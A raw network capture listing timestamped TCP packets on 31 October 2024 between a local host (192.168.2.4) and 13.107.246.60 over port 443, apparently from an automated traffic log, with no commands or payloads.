                                                  Oct 31, 2024 20:50:34.933180094 CET4435232313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.933871031 CET52323443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.933876038 CET4435232313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.934726954 CET4435232413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.935152054 CET52324443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.935204983 CET4435232413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.935944080 CET52324443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.935956001 CET4435232413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.982233047 CET4435232613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.982768059 CET52326443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.982817888 CET4435232613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:34.983457088 CET52326443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:34.983474970 CET4435232613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.054471016 CET4435232713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.054533005 CET4435232713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.054661989 CET52327443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.058624029 CET4435232513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.058645010 CET4435232513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.058693886 CET4435232513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.058772087 CET52325443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.062367916 CET52327443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.062385082 CET4435232713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.062397003 CET52327443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.062402964 CET4435232713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.065638065 CET52325443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.065642118 CET4435232513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.065654039 CET52325443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.065658092 CET4435232513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.066694021 CET4435232313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.066716909 CET4435232313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.066768885 CET4435232313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.066775084 CET52323443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.066812992 CET52323443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.069067955 CET4435232413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.069137096 CET4435232413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.069233894 CET52324443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.085345030 CET52323443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.085364103 CET4435232313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.085375071 CET52323443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.085380077 CET4435232313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.087306023 CET52324443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.087363005 CET4435232413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.087390900 CET52324443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.087399006 CET4435232413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.096230030 CET52328443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.096283913 CET4435232813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.096353054 CET52328443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.096653938 CET52329443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.096693039 CET4435232913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.096744061 CET52329443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.097907066 CET52330443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.097918034 CET4435233013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.098148108 CET52330443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.099746943 CET52328443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.099762917 CET4435232813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.100004911 CET52329443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.100023031 CET4435232913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.100152016 CET52330443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.100162029 CET4435233013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.101010084 CET52331443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.101020098 CET4435233113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.101125002 CET52331443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.101557016 CET52331443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.101567030 CET4435233113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.119200945 CET4435232613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.119218111 CET4435232613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.119287014 CET52326443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.119323015 CET4435232613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.119791031 CET4435232613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.119833946 CET52326443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.120219946 CET52326443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.120237112 CET4435232613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.120270967 CET52326443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.120277882 CET4435232613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.128402948 CET52332443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.128438950 CET4435233213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.128506899 CET52332443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.129364967 CET52332443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.129379034 CET4435233213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.843038082 CET4435232813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.843509912 CET52328443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.843545914 CET4435232813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.843969107 CET52328443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.843975067 CET4435232813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.855802059 CET4435233013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.856184959 CET52330443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.856194019 CET4435233013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.856651068 CET52330443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.856657028 CET4435233013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.862592936 CET4435232913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.862934113 CET52329443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.862970114 CET4435232913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.863352060 CET52329443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.863358021 CET4435232913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.867254972 CET4435233113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.867640018 CET52331443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.867646933 CET4435233113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.868016958 CET52331443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.868021011 CET4435233113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.897263050 CET4435233213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.897628069 CET52332443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.897644043 CET4435233213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.897989988 CET52332443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.897994041 CET4435233213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.975469112 CET4435232813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.975533009 CET4435232813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.975589037 CET52328443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.976057053 CET52328443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.976075888 CET4435232813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.982944965 CET52333443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.983019114 CET4435233313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.983089924 CET52333443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.983473063 CET52333443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.983508110 CET4435233313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.991239071 CET4435233013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.991586924 CET4435233013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.991640091 CET52330443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.991657972 CET52330443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.991663933 CET4435233013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.994837046 CET52334443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.994869947 CET4435233413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.994935989 CET52334443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.995150089 CET52334443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.995162010 CET4435233413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.999025106 CET4435232913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.999104023 CET4435232913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.999154091 CET52329443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.999233007 CET52329443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.999233007 CET52329443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:35.999249935 CET4435232913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:35.999260902 CET4435232913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.002175093 CET52335443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.002207994 CET4435233513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.002266884 CET52335443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.002374887 CET52335443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.002394915 CET4435233513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.003598928 CET4435233113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.003716946 CET4435233113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.003767967 CET52331443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.003926992 CET52331443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.003931999 CET4435233113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.003943920 CET52331443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.003948927 CET4435233113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.007316113 CET52336443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.007330894 CET4435233613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.007481098 CET52336443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.007852077 CET52336443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.007865906 CET4435233613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.037836075 CET4435233213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.037889004 CET4435233213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.038213015 CET52332443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.038578033 CET52332443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.038587093 CET4435233213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.038600922 CET52332443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.038604975 CET4435233213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.041819096 CET52337443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.041851044 CET4435233713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.042083025 CET52337443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.042237043 CET52337443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.042249918 CET4435233713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.719713926 CET4435233313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.725111008 CET52333443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.725171089 CET4435233313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.725779057 CET52333443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.725792885 CET4435233313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.746527910 CET4435233413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.747205973 CET52334443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.747237921 CET4435233413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.748024940 CET52334443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.748034000 CET4435233413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.779217005 CET4435233713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.781243086 CET4435233513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.787446976 CET4435233613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.811232090 CET52337443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.811258078 CET4435233713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.811976910 CET52337443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.811983109 CET4435233713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.812443972 CET52335443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.812470913 CET4435233513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.814918041 CET52335443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.814929008 CET4435233513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.815756083 CET52336443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.815774918 CET4435233613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.816708088 CET52336443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.816713095 CET4435233613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.855557919 CET4435233313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.855628967 CET4435233313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.855772018 CET52333443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.861285925 CET52333443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.861313105 CET4435233313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.861341953 CET52333443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.861360073 CET4435233313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.875785112 CET4435233413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.875946999 CET4435233413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.876022100 CET52334443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.891181946 CET52334443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.891206026 CET4435233413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.891217947 CET52334443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.891225100 CET4435233413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.897115946 CET52338443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.897144079 CET4435233813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.897214890 CET52338443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.898401976 CET52339443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.898467064 CET4435233913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.898556948 CET52339443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.911503077 CET52338443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.911518097 CET4435233813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.911951065 CET52339443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.911973953 CET4435233913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.948709011 CET4435233513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.949426889 CET4435233513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.949547052 CET52335443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.963799953 CET4435233613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.963870049 CET4435233613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.963922024 CET52336443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.993016958 CET52335443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.993036985 CET4435233513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.993066072 CET52335443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.993079901 CET4435233513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.993390083 CET52336443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.993400097 CET4435233613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:36.993417978 CET52336443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:36.993422985 CET4435233613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.005480051 CET52340443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.005517960 CET4435234013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.005589962 CET52340443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.006227970 CET52340443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.006253958 CET4435234013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.007075071 CET52341443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.007097960 CET4435234113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.007152081 CET52341443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.007287025 CET52341443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.007299900 CET4435234113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.029376030 CET4435233713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.029484987 CET4435233713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.029548883 CET52337443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.029671907 CET52337443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.029691935 CET4435233713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.029709101 CET52337443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.029715061 CET4435233713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.032291889 CET52342443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.032341003 CET4435234213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.032464981 CET52342443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.032567978 CET52342443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.032593966 CET4435234213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.682071924 CET4435233813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.682501078 CET52338443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.682533026 CET4435233813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.683346033 CET4435233913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.683589935 CET52338443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.683595896 CET4435233813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.684216022 CET52339443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.684247971 CET4435233913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.685295105 CET52339443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.685301065 CET4435233913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.756403923 CET4435234013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.756890059 CET52340443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.756927967 CET4435234013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.757356882 CET52340443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.757365942 CET4435234013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.781295061 CET4435234113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.781748056 CET52341443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.781783104 CET4435234113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.782244921 CET52341443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.782250881 CET4435234113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.792344093 CET4435234213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.792735100 CET52342443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.792747974 CET4435234213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.793138027 CET52342443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.793143034 CET4435234213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.816616058 CET4435233913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.816680908 CET4435233913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.816919088 CET52339443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.817325115 CET52339443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.817352057 CET4435233913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.817363024 CET52339443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.817369938 CET4435233913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.821463108 CET52343443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.821492910 CET4435234313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.821580887 CET52343443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.822565079 CET52343443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.822580099 CET4435234313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.830509901 CET4435233813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.831001043 CET4435233813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.831054926 CET52338443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.831087112 CET52338443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.831105947 CET4435233813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.831119061 CET52338443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.831124067 CET4435233813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.833794117 CET52344443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.833828926 CET4435234413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.834002972 CET52344443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.834265947 CET52344443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.834286928 CET4435234413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.887190104 CET4435234013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.887316942 CET4435234013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.887382030 CET52340443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.887526035 CET52340443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.887541056 CET4435234013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.887556076 CET52340443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.887562990 CET4435234013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.890503883 CET52345443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.890548944 CET4435234513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.890628099 CET52345443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.890779972 CET52345443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.890798092 CET4435234513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.916860104 CET4435234113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.917965889 CET4435234113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.918031931 CET52341443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.918087959 CET52341443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.918101072 CET4435234113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.918124914 CET52341443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.918132067 CET4435234113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.920705080 CET52346443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.920742989 CET4435234613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.920809031 CET52346443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.920958996 CET52346443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.920979023 CET4435234613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.923024893 CET4435234213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.923127890 CET4435234213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.923213005 CET52342443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.923260927 CET52342443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.923274994 CET4435234213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.923291922 CET52342443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.923297882 CET4435234213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.925395012 CET52347443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.925425053 CET4435234713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:37.925546885 CET52347443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.925705910 CET52347443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:37.925718069 CET4435234713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.562019110 CET4435234413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.562568903 CET52344443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.562587976 CET4435234413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.563199997 CET52344443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.563205004 CET4435234413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.563817978 CET4435234313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.564214945 CET52343443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.564233065 CET4435234313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.564747095 CET52343443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.564750910 CET4435234313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.668423891 CET4435234513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.669038057 CET52345443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:38.669066906 CET4435234513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:38.669668913 CET52345443192.168.2.413.107.246.60
